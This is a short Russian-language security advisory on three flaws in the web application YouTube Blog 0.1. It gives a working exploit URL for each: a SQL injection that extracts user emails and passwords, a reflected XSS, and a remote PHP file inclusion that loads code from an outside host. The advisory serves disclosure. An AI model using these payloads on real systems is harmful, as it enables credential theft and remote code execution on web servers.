Программа: YouTube Blog 0.1

Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS
атаку, выполнить произвольный PHP сценарий и выполнить произвольный SQL код в
базе данных приложения.

1) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
todos.php. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,
contrasena,5,6,7+from+ytb_usuarios+where+id=1/*

2) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
mensaje.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в
контексте безопасности уязвимого сайта.

Эксплоит:

http://victim/ytb/mensaje.php?m=<script>alert(/xss/)</script>

3) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
cuerpo.php. Удаленный пользователь может выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости
требует включение опции "register_globals" в конфигурационном файле PHP.

Эксплоит:

http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии